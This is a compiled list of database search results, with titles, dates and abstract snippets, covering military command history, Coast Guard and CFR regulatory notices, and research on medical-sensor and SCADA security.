Development of Strategic Air Command, 1946 - 1976
1976-03-01
flashes red. Azure , two clouds proper, one issuing from sinister chief and one issuing from dexter base, a cubit arm in armor in bend, issuing...security reasons, no statistics have been Included for those types of recon- naissance aircraft currently assigned. The text was prepared by Mr. J. C...Hopkins who was aided by Mr. Sheldon A. Goldberg, Command Archivist, who critically reviewed the text and selected the photographs. Special
2008-04-01
what A Goldwater- Nichols accomplished for the U.S. Military, improve responsiveness, improve command relationships , and educate our interagency...See Appendix A] further refined command relationships within the military and centralized control of the services. While military command... relationships improved with these reforms, command and control issues within the services remained. Operation Eagle Claw, the failed Iranian hostage rescue
Satellite Telemetry and Command using Big LEO Mobile Telecommunications Systems
NASA Technical Reports Server (NTRS)
Huegel, Fred
1998-01-01
Various issues associated with satellite telemetry and command using Big LEO mobile telecommunications systems are presented in viewgraph form. Specific topics include: 1) Commercial Satellite system overviews: Globalstar, ICO, and Iridium; 2) System capabilities and cost reduction; 3) Satellite constellations and contact limitations; 4) Capabilities of Globalstar, ICO and Iridium with emphasis on Globalstar; and 5) Flight transceiver issues and security.
32 CFR 1290.7 - Responsibilities.
Code of Federal Regulations, 2010 CFR
2010-07-01
... Responsibilities. (a) HQ DLA. (1) The Command Security Officer, DLA (DLA-T) will: (i) Exercise staff supervision... enforcement/security force (080, 083, 085 and 1800 series) personnel to issue DD Form 1805. (3) Periodically...
32 CFR 1290.7 - Responsibilities.
Code of Federal Regulations, 2011 CFR
2011-07-01
... Responsibilities. (a) HQ DLA. (1) The Command Security Officer, DLA (DLA-T) will: (i) Exercise staff supervision... enforcement/security force (080, 083, 085 and 1800 series) personnel to issue DD Form 1805. (3) Periodically...
1992-06-01
Boards) Security, Privacy, and Freedom of Speech Issues 4.1.2 Understand the relationships between information processing and collection and...to-many (Mailing and discussion Lists) ... Many-to-Many (Bulletin Boards) Security, Privacy, and Freedom of Speech Issues 69 4.1.3 Understand the...Communication one-to-one (e-mail) °o° one-to-many (Mailing and discussion Lists) ... Many-to-Many (Bulletin Boards) oo Security, Privacy, and Freedom of Speech Issues
On Preparing for Squadron Command
1988-04-01
Gortler, Majur Gordon D. "Management Development---Could the Air Force Be Doing More?" Resear,;h Study, Air Command and Staff College. 1 07:3. 20...ABSTRACT (Continue on reverse If necessary and identify by block number) -This study addresses the broad issue of preparing Air Force officers for...are obsolete. SECURITY CLASSIFICATION OF THIS PAGE UNCLASSIFIED - - PREFACE This study addresses the broad Issue of preparing Air Force officers to
A National Security Issue: Challenges to the All-Volunteer Force
2012-02-25
Command, June 16, 2011. 25 U.S. Census Bureau, “Age and Sex in the United States: 2011,” http://www.census.gov/ population/www/socdemo/age...R. Thurman, Future Soldiers and the Quality Imperative (Fort Knox, KY: United States Army Recruiting Command, 1995), 53. 37 Lolita C. Baldor
The Development of Strategic Air Command, 1946-1976
1976-03-21
branch green, and three lightning flashes red. SHIELD Azure , two clouds proper, one issuing from sinister chief and one issuing from dexter base, a...Financial Status, since 1958. For security reasons, no statistics have been included for those types of recon- naissance aircraft currently a ned. The text ...was prepared by . J C.)Hop~ns who was aided by Mr. Sheldon A. Goldberg, Command Archivist, w o critically reviewed the text and selected the
Secure Authentication for Remote Patient Monitoring with Wireless Medical Sensor Networks †
Hayajneh, Thaier; Mohd, Bassam J; Imran, Muhammad; Almashaqbeh, Ghada; Vasilakos, Athanasios V.
2016-01-01
There is broad consensus that remote health monitoring will benefit all stakeholders in the healthcare system and that it has the potential to save billions of dollars. Among the major concerns that are preventing the patients from widely adopting this technology are data privacy and security. Wireless Medical Sensor Networks (MSNs) are the building blocks for remote health monitoring systems. This paper helps to identify the most challenging security issues in the existing authentication protocols for remote patient monitoring and presents a lightweight public-key-based authentication protocol for MSNs. In MSNs, the nodes are classified into sensors that report measurements about the human body and actuators that receive commands from the medical staff and perform actions. Authenticating these commands is a critical security issue, as any alteration may lead to serious consequences. The proposed protocol is based on the Rabin authentication algorithm, which is modified in this paper to improve its signature signing process, making it suitable for delay-sensitive MSN applications. To prove the efficiency of the Rabin algorithm, we implemented the algorithm with different hardware settings using Tmote Sky motes and also programmed the algorithm on an FPGA to evaluate its design and performance. Furthermore, the proposed protocol is implemented and tested using the MIRACL (Multiprecision Integer and Rational Arithmetic C/C++) library. The results show that secure, direct, instant and authenticated commands can be delivered from the medical staff to the MSN nodes. PMID:27023540
Secure Authentication for Remote Patient Monitoring with Wireless Medical Sensor Networks.
Hayajneh, Thaier; Mohd, Bassam J; Imran, Muhammad; Almashaqbeh, Ghada; Vasilakos, Athanasios V
2016-03-24
There is broad consensus that remote health monitoring will benefit all stakeholders in the healthcare system and that it has the potential to save billions of dollars. Among the major concerns that are preventing the patients from widely adopting this technology are data privacy and security. Wireless Medical Sensor Networks (MSNs) are the building blocks for remote health monitoring systems. This paper helps to identify the most challenging security issues in the existing authentication protocols for remote patient monitoring and presents a lightweight public-key-based authentication protocol for MSNs. In MSNs, the nodes are classified into sensors that report measurements about the human body and actuators that receive commands from the medical staff and perform actions. Authenticating these commands is a critical security issue, as any alteration may lead to serious consequences. The proposed protocol is based on the Rabin authentication algorithm, which is modified in this paper to improve its signature signing process, making it suitable for delay-sensitive MSN applications. To prove the efficiency of the Rabin algorithm, we implemented the algorithm with different hardware settings using Tmote Sky motes and also programmed the algorithm on an FPGA to evaluate its design and performance. Furthermore, the proposed protocol is implemented and tested using the MIRACL (Multiprecision Integer and Rational Arithmetic C/C++) library. The results show that secure, direct, instant and authenticated commands can be delivered from the medical staff to the MSN nodes.
Overview of Climate Confluence Security Issues
NASA Astrophysics Data System (ADS)
Reisman, J. P.
2011-12-01
Presentation will focus on an overview of the security perspectives based on the confluence considerations including energy, economics and climate change. This will include perspectives from reports generated by the Quadrennial Defense Review, Joint Forces Command, the Center for Strategic International Studies, MIT, the Inter-agency Climate Change Adaptation Task Force, the Central Intelligence Agency, the Center for Naval Analysis, and other relevant reports. The presentation will highlight the connections between resource issues and climate change which can be interpreted into security concerns. General discussion of global issues, contextual review of AR4 WGII may be included and any other report updates as applicable. The purpose of this presentation is to give a rounded view of the general qualitative and quantitative perspectives regarding climate related security considerations.
Filling the healthcare IT gap by 2015.
Bigalke, John T
2009-06-01
Healthcare organizations have been slow to adopt health IT. However, the government stimulus package and impending fines for hospitals that have not implemented HIT by 2015 will motivate adoption. Issues confronting healthcare executives include selection of vendors, command of privacy and security issues, and implementation of industry standards.
Iraq Reconstruction: Lessons from Auditing U.S.-funded Stabilization and Reconstruction Activities
2012-10-01
Emergency Response Program: Hotel Construction Successfully Completed, but Project Management Issues Remain 09-025 7/26/2009 Commander’s Emergency...Emergency Response Pro- gram: Hotel Construction Completed, but Project Management Issues Remain,” 7/26/2009. 47. SIGIR Audit 11-003, “Iraqi Security Forces
Security Encryption Scheme for Communication of Web Based Control Systems
NASA Astrophysics Data System (ADS)
Robles, Rosslin John; Kim, Tai-Hoon
A control system is a device or set of devices to manage, command, direct or regulate the behavior of other devices or systems. The trend in most systems is that they are connected through the Internet. Traditional Supervisory Control and Data Acquisition Systems (SCADA) is connected only in a limited private network Since the internet Supervisory Control and Data Acquisition Systems (SCADA) facility has brought a lot of advantages in terms of control, data viewing and generation. Along with these advantages, are security issues regarding web SCADA, operators are pushed to connect Control Systems through the internet. Because of this, many issues regarding security surfaced. In this paper, we discuss web SCADA and the issues regarding security. As a countermeasure, a web SCADA security solution using crossed-crypto-scheme is proposed to be used in the communication of SCADA components.
Russia’s Conventional Military Weakness and Substrategic Nuclear Policy
2011-01-01
to risk, and fewer in the security elite dare to contemplate. As Lieutenant-General Vladimir Chirkin, the former Commander of the Siberian Mili- tary...Speaking of the deployment of two new brigades near the Russian-Chinese border, Lieutenant-General Vladimir Chirkin, Commander of the Siberian ...Roger McDermott, “Bat or Mouse ? The Strange Case of Reforming Spetsnaz,” Eurasia Daily Monitor, Volume 7, Issue 198, November 2, 2010. Author
Information Management Challenges in Achieving Coalition Interoperability
2001-12-01
by J. Dyer SESSION I: ARCHITECTURES AND STANDARDS: FUNDAMENTAL ISSUES Chairman: Dr I. WHITE (UK) Planning for Interoperability 1 by W.M. Gentleman...framework – a crucial step toward achieving coalition C4I interoperability. TOPICS TO BE COVERED: 1 ) Maintaining secure interoperability 2) Command...d’une coalition. SUJETS À EXAMINER : 1 ) Le maintien d’une interopérabilité sécurisée 2) Les interfaces des systèmes de commandement : 2a
The DISAM Journal of International Security Assistance Management. Volume 29, Number 3, July 2007
2007-07-01
with Canada and Mexico, with relatively very few permanently assigned forces . You can read about a number of issues addressed by contributing authors...26 Commander Curtis Jenkins, USNR, Lockheed Martin “Taking the Communication High Ground The Case for a Joint Inter-Agency Task Force ...permanently assigned forces . The command is assigned forces whenever necessary to execute missions, as ordered by the president and secretary of
Office of Command Security Total Quality Management Plan
1989-07-01
outlines the Office of Command Security instruction for TQM implementation. Keywords: TQM (Total Quality Management ), DLA Office of Command Security, Continuous process improvement, Automatic data processing security.
78 FR 32121 - When Pigs Fly Fireworks Display; San Diego, CA
Federal Register 2010, 2011, 2012, 2013, 2014
2013-05-29
... Act (APA) (5 U.S.C. 553(b)). This provision authorizes an agency to issue a rule without prior notice... Security Management Directive 023-01 and Commandant Instruction M16475.lD, which guide the Coast Guard in...
Code of Federal Regulations, 2010 CFR
2010-10-01
... boundaries. (q) Command and control means making and issuing protective action decisions and directing... 44 Emergency Management and Assistance 1 2010-10-01 2010-10-01 false Definitions. 352.1 Section... SECURITY PREPAREDNESS COMMERCIAL NUCLEAR POWER PLANTS: EMERGENCY PREPAREDNESS PLANNING § 352.1 Definitions...
Federal Register 2010, 2011, 2012, 2013, 2014
2013-12-02
...-AA87 Security Zones; Naval Base Point Loma; Naval Mine Anti Submarine Warfare Command; San Diego Bay... establishing a new security zone at the Naval Mine and Anti-Submarine Warfare Command to protect the relocated... Commander of Naval Base Point Loma, the Commander of the Naval Mine Anti Submarine Warfare Command, and the...
Federal Register 2010, 2011, 2012, 2013, 2014
2013-08-28
...-AA87 Security Zones; Naval Base Point Loma; Naval Mine Anti-Submarine Warfare Command; San Diego Bay... Anti-Submarine Warfare Command to protect the relocated marine mammal program. These security zone... Warfare Command, the Commander of Naval Region Southwest, or a designated representative of those...
76 FR 19911 - Drawbridge Operation Regulations; Apponagansett River, Dartmouth, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2011-04-11
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2011-0203] Drawbridge Operation Regulations; Apponagansett River, Dartmouth, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a...
77 FR 25890 - Drawbridge Operation Regulations; Manchester Harbor, Manchester, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2012-05-02
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2012-0344] Drawbridge Operation Regulations; Manchester Harbor, Manchester, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a...
76 FR 72308 - Drawbridge Operation Regulation; Upper Mississippi River, Dubuque, IA
Federal Register 2010, 2011, 2012, 2013, 2014
2011-11-23
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2011-1039] Drawbridge Operation Regulation; Upper Mississippi River, Dubuque, IA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, Eighth Coast Guard District, has issued a...
76 FR 79066 - Drawbridge Operation Regulation; Upper Mississippi River, Clinton, IA
Federal Register 2010, 2011, 2012, 2013, 2014
2011-12-21
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2011-1018] Drawbridge Operation Regulation; Upper Mississippi River, Clinton, IA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, Eighth Coast Guard District, has issued a...
75 FR 70817 - Drawbridge Operation Regulation; Upper Mississippi River, Dubuque, IA
Federal Register 2010, 2011, 2012, 2013, 2014
2010-11-19
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2010-1039] Drawbridge Operation Regulation; Upper Mississippi River, Dubuque, IA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, Eighth Coast Guard District, has issued a...
75 FR 65567 - Drawbridge Operation Regulations; Mystic River, Charlestown, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2010-10-26
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2010-0924] Drawbridge Operation Regulations; Mystic River, Charlestown, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a temporary...
77 FR 6963 - Drawbridge Operation Regulations; Merrimack River, Amesbury, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2012-02-10
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2012-0006] Drawbridge Operation Regulations; Merrimack River, Amesbury, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a temporary...
76 FR 14804 - Drawbridge Operation Regulations; Bass River, Beverly, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2011-03-18
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2011-0149] Drawbridge Operation Regulations; Bass River, Beverly, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a temporary...
78 FR 35756 - Drawbridge Operation Regulations; Charles River, Boston, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2013-06-14
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [USCG-2013-0464] Drawbridge Operation Regulations; Charles River, Boston, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a temporary [[Page 35757...
75 FR 62469 - Drawbridge Operation Regulations; Charles River, Boston, MA, Maintenance
Federal Register 2010, 2011, 2012, 2013, 2014
2010-10-12
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2010-0847] Drawbridge Operation Regulations; Charles River, Boston, MA, Maintenance AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a...
77 FR 34797 - Drawbridge Operation Regulations; Chelsea River, Chelsea and East Boston, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2012-06-12
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [USCG-2012-0396] Drawbridge Operation Regulations; Chelsea River, Chelsea and East Boston, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a temporary...
77 FR 56115 - Drawbridge Operation Regulations; Fort Point Channel, Boston, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2012-09-12
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2012-0815] Drawbridge Operation Regulations; Fort Point Channel, Boston, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a temporary...
76 FR 73510 - Drawbridge Operation Regulations; Saugus River, Lynn and Revere, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2011-11-29
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2011-1034] Drawbridge Operation Regulations; Saugus River, Lynn and Revere, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a...
78 FR 65874 - Drawbridge Operation Regulations; Mystic River, Charlestown and Everett, MA
Federal Register 2010, 2011, 2012, 2013, 2014
2013-11-04
... DEPARTMENT OF HOMELAND SECURITY Coast Guard 33 CFR Part 117 [Docket No. USCG-2013-0889] Drawbridge Operation Regulations; Mystic River, Charlestown and Everett, MA AGENCY: Coast Guard, DHS. ACTION: Notice of temporary deviation from regulations. SUMMARY: The Commander, First Coast Guard District, has issued a...
2008-10-24
COMMANDER, U.S. ARMY MATERIAL COMMAND LOGISTICS SUPPORT ACTIVITY Department of Defense Office of Inspector General Report No. SPO-2009...report the serial numbers of weapons it controlled to the DoD SA/LW Registry maintained by the U.S. Army Material Command Logistics Support... Material Command Logistics Support Activity assist the Combined Security Transition Command- Afghanistan in reporting serial numbers for U.S.-supplied
Examining Cyber Command Structures
2015-03-01
domains, cyber, command and control, USCYBERCOM, combatant command, cyber force PAGES 65 16. PRICE CODE 17. SECURITY 18. SECURITY 19. SECURITY 20...USCYBERCOM, argue for the creation of a stand-alone cyber force.11 They claim that the military’s tradition-oriented and inelastic nature make the
Protecting Commercial Space Systems: A Critical National Security Issue
1999-04-01
The Influence of Sea Power on World History: 1660-1783” (excerpt). Air Command and Staff College War Theory Coursebook (Academic Year 1999), 87- 88. 6...Publications. State of the Space Industry, 1998, 42, 49; and (2) US Census Bureau, Statistical Abstract of the United States: 1998, 1 Oct 1998, 578...College War Theory Coursebook (Academic Year 1999), 109. 2 Stubbs, Captain Bruce B., “The Coast Guard’s National Security Role in the 21st Century.” Air
Africa Command: U.S. Strategic Interests and the Role of the U.S. Military in Africa
2010-04-03
Charles Wald , “The Phase Zero Campaign,” Joint Force Quarterly, Issue 43, 4th Quarter 2006, available at http://www.ndu.edu/inss. 12 DOD, The Quadrennial...Deputy Under Secretary Henry From the Pentagon,” February 7, 2007. 19 See, for example, Lisa Schirch and Aaron Kishbaugh, “Leveraging ‘3D’ Security...Testimony of General Charles Wald , Member, Military Advisory Board, at a hearing on Climate Change and National Security Threats by the Senate Foreign
32 CFR 154.31 - Authorized requesters.
Code of Federal Regulations, 2010 CFR
2010-07-01
... and Security, Washington Headquarters Services. (e) Commanders of Unified and Specified Commands or... National Defense Department of Defense OFFICE OF THE SECRETARY OF DEFENSE SECURITY DEPARTMENT OF DEFENSE PERSONNEL SECURITY PROGRAM REGULATION Requesting Personnel Security Investigations § 154.31 Authorized...
2009-10-30
review of the invoices submitted in support of the GMASS contract. S PE CI AL I NS PECTO R GE NE R AL FO R I RA Q RE CO NST R UC TIO N...Command-Iraq (MNSTC- I ), using the Iraq Security Forces Fund, issued task orders for a program to assist the Iraqi Army in developing a self...its first tier subcontractor. According to contracting and MNSTC- I officials, Anham had the capability to obtain foreign military vehicle parts
1981-01-01
of prob- being an attack assessment. From there it goes to lems due to the atmosphere and due to solar the National Command Authority who acts on the...19-4-19"-8). MITRE/Bedford Panel Member for Institute for (omputer ’Kiences and 1959 Technology Evaluation Panal for the National Bureau of
Code of Federal Regulations, 2014 CFR
2014-07-01
... Submarine Warfare Command; San Diego Bay, San Diego, CA. 165.1103 Section 165.1103 Navigation and Navigable... Eleventh Coast Guard District § 165.1103 Security Zone; Naval Mine Anti Submarine Warfare Command; San... the Naval Mine Anti Submarine Warfare Command, bound by the following coordinates: 32°43′40.9″ N, 117...
1981-01-31
Intelligence and Security Command (INSCOM), the US Army Communications Command (USACC), and the US Army Computer Systems Command (USACSC). (3...responsibilities of the US-Army Intelligence and Security Command (INSCOM), the US Army Communications Command (USACC), and the US Army Computer Systems...necessary to sustain, modify, and improve a deployed system’s computer software, as defined by the User or his representative. It includes evaluation
The Operational Commander’s Role in Planning and Executing a Successful Campaign
1992-04-20
44 IS. PRICE CODE RIDGWAY IN KOREAN WAR AS CDR 8th ARMY ________ It. SECURITY CLASSIFICATION 10. SECURITY CLASSIFICATION 13. SECURITY CLASSIFICATION...Field-Marshal Slim as the 14th Army commander in Burma; General MacArthur in the World War II Cartwheel Operation and General Ridgway as the 8th Army...64 :. Introduction In his book, Command in War , Martin Van Creveld referred to the period of strategic
A National Security Strategy for Sweden: Balancing Risks and Opportunities in the 21st Century
2010-04-01
Command and Staff College. International Security Studies: AY10 Coursebook . Montgomery, 2009. Air Command and Staff College. War Studies Course: AY10... Coursebook . Montgomery, 2009. Assadourian, Eric (Project Director at the World Watch Institute). Vital Signs 2007-2008; The Trends that are Shaping Our...Air Command and Staff College International Security Studies: AY10 Coursebook . Montgomery, 2009. Edgar, Johan, Linda Hjerten, Mira Micic and Eric
NASA Technical Reports Server (NTRS)
Mayer, Michael G.
1996-01-01
Future C4 systems will alter the traditional balance between force and information, having a profound influence on doctrine and the operational commander's decision making process. The Joint Staff's future vision of C4 is conceptualized in 'C4I for the Warrior' which envisions a joint C4I architecture providing timely sensor to shoot information direct to the warfighter. C4 system must manage and filter an overwhelming amount of information; deal with interoperability issues; overcome technological limitations; meet emerging security requirements; and protect against 'Information Warfare.' Severe budget constraints necessitate unified control of C4 systems under singular leadership for the common good of all the services. In addition, acquisition policy and procedures must be revamped to allow new technologies to be fielded quickly; and the commercial marketplace will become the preferred starting point for modernization. Flatter command structures are recommended in this environment where information is available instantaneously. New responsibilities for decision making at lower levels are created. Commanders will have to strike a balance between exerting greater control and allowing subordinates enough flexibility to maintain initiative. Clearly, the commander's intent remains the most important tool in striking this balance.
2012-04-01
cultural analysis using the T.R.I.P.L.E. framework as taught in USMC Command & Staff College. The most challenging issues identified through the cultural...18 US INVOLVEMENT IN SOUTH SUDAN...deployment of U.S. forces to the country. The approach I used was an in-depth historical cultural analysis of the South Sudanese armed forces
Company Command: The Bottom Line
1990-11-20
who engage in original research on national security issues. NDU Press publishes the best of this research . In addition, the Press publishes other...79 Stan dard Inslallation/Division Person-. nel Systems jSIDPERS)-SIDPEiIS Be- p orts- Non coinmmission ed Officer Evaluation fleports (NO-ERs--Offtcer... Non - combatant Evacuation Operation (NEO) xii and Prenaration for Overseas Moveizent (PO.MW-Finance The Bottom Line for Personnel and Administration
The U.S. Navy Littoral Combat Ship: Current Issues and How to Employ It in the Future
2012-03-07
Ship: NIA Curr-ent Issues and How to Deploy It in the Future 5b. GRANT NUMBER N/A 5c. PROGRAM ELEMENT NUMBER N/A 6. AUTHORCSl 5d. PROJECT NUMBER...Lieutenant Commander Gregory M Zimmerman, United States Navy N/A 5e. TASK NUMBER N/A 5f. WORK UNIT NUMBER NIA 7. PERFORMING ORGANIZATION NAME(S...Launch Module, MH-60R helicopter, UAV (Fire Scout), Mission Package Application Software Module, and the optional Maritime Security Module. 27 LCS can
32 CFR 700.826 - Physical security.
Code of Federal Regulations, 2014 CFR
2014-07-01
... 32 National Defense 5 2014-07-01 2014-07-01 false Physical security. 700.826 Section 700.826 National Defense Department of Defense (Continued) DEPARTMENT OF THE NAVY UNITED STATES NAVY REGULATIONS... Commanding Officers in General § 700.826 Physical security. (a) The commanding officer shall take appropriate...
32 CFR 700.826 - Physical security.
Code of Federal Regulations, 2013 CFR
2013-07-01
... 32 National Defense 5 2013-07-01 2013-07-01 false Physical security. 700.826 Section 700.826 National Defense Department of Defense (Continued) DEPARTMENT OF THE NAVY UNITED STATES NAVY REGULATIONS... Commanding Officers in General § 700.826 Physical security. (a) The commanding officer shall take appropriate...
32 CFR 700.826 - Physical security.
Code of Federal Regulations, 2010 CFR
2010-07-01
... 32 National Defense 5 2010-07-01 2010-07-01 false Physical security. 700.826 Section 700.826 National Defense Department of Defense (Continued) DEPARTMENT OF THE NAVY UNITED STATES NAVY REGULATIONS... Commanding Officers in General § 700.826 Physical security. (a) The commanding officer shall take appropriate...
32 CFR 700.826 - Physical security.
Code of Federal Regulations, 2011 CFR
2011-07-01
... 32 National Defense 5 2011-07-01 2011-07-01 false Physical security. 700.826 Section 700.826 National Defense Department of Defense (Continued) DEPARTMENT OF THE NAVY UNITED STATES NAVY REGULATIONS... Commanding Officers in General § 700.826 Physical security. (a) The commanding officer shall take appropriate...
32 CFR 700.826 - Physical security.
Code of Federal Regulations, 2012 CFR
2012-07-01
... 32 National Defense 5 2012-07-01 2012-07-01 false Physical security. 700.826 Section 700.826 National Defense Department of Defense (Continued) DEPARTMENT OF THE NAVY UNITED STATES NAVY REGULATIONS... Commanding Officers in General § 700.826 Physical security. (a) The commanding officer shall take appropriate...
A Homeland Security Net Assessment Needed Now!
2015-12-01
George Washington University. Cilluffo argues that the DHS responds to most threats reactively and has only a limited capability for assessing...also the director of the NSA and the two organizations are both located at Fort Meade , Maryland, the two commands have dif- ferent missions and operate...12. 75. David Clark, Thomas Berson, and Herbert S. Lin, eds., At the Nexus of Cybersecurity and Public Policy: Some Basic Concepts and Issues
75 FR 63086 - Drawbridge Operation Regulations; Duluth Ship Canal (Duluth-Superior Harbor).
Federal Register 2010, 2011, 2012, 2013, 2014
2010-10-14
...Commander, Ninth Coast Guard District, has issued a temporary deviation from the regulation governing the operation of the Duluth Ship Canal Aerial Bridge at Mile 0.1 over the Duluth Ship Canal, at Duluth, MN, for scheduled maintenance. During this temporary deviation the bridge will be secured to masted navigation. Vessels that can pass under the bridge without an opening may do so at any time.
Initiative in Soviet Air Force Tactics and Decision Making.
1986-06-01
34 [Ref. 7: p. 1211 [Ref. 8: p.197] The issue is do modern Soviet Air Force command style and tactics allow for the freidom of actions or initiative...Approved for public release; distribution is unlimited. ;:.,,. ,,- .,, ... ., , V SECURITY CLASSIFICATION OF THIS PACE "" ? /"/’ 22 - REPORT DOCUMENTATION...REPORT 2b. DECLASSiFICATIONiDOWNGRAOING SCHEDULE Approved for public release; distribution is unlimited. 4 PERFORMING ORGANIZATION REPORT NUMBER(S) S
U.S.-China Military Contacts: Issues for Congress
2013-07-25
military spending and doctrine , missile and nuclear nonproliferation, and other important U.S. security interests. Then, in the National Defense...the islands. Since the PRC is not an archipelagic country, it is not allowed to draw straight archipelagic baselines. The U.S. Navy may conduct...Senior Colonel based in Washington spoke officially and in uniform at the U.S. Army Training and Doctrine Command (TRADOC) in Virginia. Finally, if
The U.S. Combat and Tactical Wheeled Vehicle Fleets: Issues and Suggestions for Congress
2011-01-01
nonlinear, irregular distribution of brigade and battalion formations means that there is no longer a relatively more secure rear area, an...enhancement package, according to civilian sources, included depleted- uranium armor, digital command- and-control architecture, digital color terrain maps...system robustness and flexibility, and (3) more often than not, the preparation of the analysis (e.g., terrain formatting , laydown of forces, timing of
32 CFR Appendix B to Part 623 - Approving Authority Addresses/Telephone Numbers *
Code of Federal Regulations, 2013 CFR
2013-07-01
...; B-17. Commander, US Army Communications Security, Logistics Agency, ATTN: SELCL-NICP-IM, Fort..., Redstone Arsenal, AL 35809; B-24. Commander, US Army Security Assistance Center, ATTN: DRSAC, 5001...
32 CFR Appendix B to Part 623 - Approving Authority Addresses/Telephone Numbers *
Code of Federal Regulations, 2014 CFR
2014-07-01
...; B-17. Commander, US Army Communications Security, Logistics Agency, ATTN: SELCL-NICP-IM, Fort..., Redstone Arsenal, AL 35809; B-24. Commander, US Army Security Assistance Center, ATTN: DRSAC, 5001...
32 CFR Appendix B to Part 623 - Approving Authority Addresses/Telephone Numbers *
Code of Federal Regulations, 2010 CFR
2010-07-01
...; B-17. Commander, US Army Communications Security, Logistics Agency, ATTN: SELCL-NICP-IM, Fort..., Redstone Arsenal, AL 35809; B-24. Commander, US Army Security Assistance Center, ATTN: DRSAC, 5001...
32 CFR Appendix B to Part 623 - Approving Authority Addresses/Telephone Numbers *
Code of Federal Regulations, 2012 CFR
2012-07-01
...; B-17. Commander, US Army Communications Security, Logistics Agency, ATTN: SELCL-NICP-IM, Fort..., Redstone Arsenal, AL 35809; B-24. Commander, US Army Security Assistance Center, ATTN: DRSAC, 5001...
32 CFR Appendix B to Part 623 - Approving Authority Addresses/Telephone Numbers *
Code of Federal Regulations, 2011 CFR
2011-07-01
...; B-17. Commander, US Army Communications Security, Logistics Agency, ATTN: SELCL-NICP-IM, Fort..., Redstone Arsenal, AL 35809; B-24. Commander, US Army Security Assistance Center, ATTN: DRSAC, 5001...
2005-04-01
34National Security Coursebook ," ed. Department of International Security and Military Studies (Air University Press, 2005 (Academic Year)). 5 Bush, "The...Signaling, and Suicide Attack." 5 Ibid. p. 250 6 Ibid. p. 250 7 Ibid. p. 250 8 Air Command and Staff College, "National Security Coursebook ." 9...Department (2004). 16 Notes 15 Air Command and Staff College, "National Security Coursebook ." p. 182 16 Fernando Reinares, "Democratic Regimes
DOE Office of Scientific and Technical Information (OSTI.GOV)
Physical device safety is typically implemented locally using embedded controllers, while operations safety is primarily performed in control centers. Safe operations can be enhanced by correct design of device-level control algorithms, and protocols, procedures and operator training at the control-room level, but all can fail. Moreover, these elements exchange data and issue commands via vulnerable communication layers. In order to secure these gaps and enhance operational safety, we believe monitoring of command sequences must be combined with an awareness of physical device limitations and automata models that capture safety mechanisms. One way of doing this is by leveraging specification-based intrusionmore » detection to monitor for physical constraint violations. The method can also verify that physical infrastructure state is consistent with monitoring information and control commands exchanged between field devices and control centers. This additional security layer enhances protection from both outsider attacks and insider mistakes. We implemented specification-based SCADA command analyzers using physical constraint algorithms directly in the Bro framework and Broccoli APIs for three separate scenarios: a water heater, an automated distribution system, and an over-current protection scheme. To accomplish this, we added low-level analyzers capable of examining control system-specific protocol packets for both Modbus TCP and DNP3, and also higher-level analyzers able to interpret device command and data streams within the context of each device's physical capabilities and present operational state. Thus the software that we are making available includes the Bro/Broccoli scripts for these three scenarios, as well as simulators, written in C, of those scenarios that generate sample traffic that is monitored by the Bro/Broccoli scripts. In addition, we have also implemented systems to directly pull cyber-physical information from the OSIsoft PI historian system. We have included the Python scripts used to perform that monitoring.« less
Encryption for Remote Control via Internet or Intranet
NASA Technical Reports Server (NTRS)
Lineberger, Lewis
2005-01-01
